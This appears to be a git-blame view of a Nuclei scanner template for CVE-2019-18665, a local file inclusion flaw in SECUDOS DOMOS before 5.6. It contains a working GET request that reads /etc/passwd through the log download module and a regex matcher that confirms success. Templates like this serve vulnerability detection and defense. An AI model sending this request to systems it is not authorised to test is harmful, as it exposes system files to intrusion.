2022-06-20 03:49:11 +00:00
|
|
|
id: CVE-2019-18665
|
2022-08-22 07:17:05 +00:00
|
|
|
|
2022-06-20 03:49:11 +00:00
|
|
|
info:
|
2022-07-26 13:45:11 +00:00
|
|
|
name: DOMOS 5.5 - Local File Inclusion
|
2022-06-20 03:49:11 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2022-06-20 05:22:20 +00:00
|
|
|
description: |
|
2022-07-26 13:45:11 +00:00
|
|
|
SECUDOS DOMOS before 5.6 allows local file inclusion via the log module.
|
2022-06-20 03:49:11 +00:00
|
|
|
reference:
|
2022-06-20 05:22:20 +00:00
|
|
|
- https://atomic111.github.io/article/secudos-domos-directory_traversal
|
2022-06-20 03:49:11 +00:00
|
|
|
- https://vuldb.com/?id.144804
|
2022-06-20 07:27:30 +00:00
|
|
|
- https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6
|
2022-07-26 13:45:11 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-18665
|
2023-07-11 19:49:27 +00:00
|
|
|
- https://www.cybersecurity-help.cz/vdb/SB2019110403
|
2022-06-20 03:49:11 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cve-id: CVE-2019-18665
|
|
|
|
cwe-id: CWE-22
|
2023-07-11 19:49:27 +00:00
|
|
|
epss-score: 0.10136
|
2023-04-12 10:55:48 +00:00
|
|
|
cpe: cpe:2.3:a:secudos:domos:*:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: secudos
|
|
|
|
product: domos
|
|
|
|
tags: cve,cve2019,domos,lfi
|
2022-06-20 03:49:11 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-06-20 03:49:11 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2022-06-20 05:22:20 +00:00
|
|
|
- "{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd"
|
|
|
|
|
2022-06-20 03:49:11 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2022-06-20 05:22:20 +00:00
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
|
|
|
|
2022-06-20 03:49:11 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|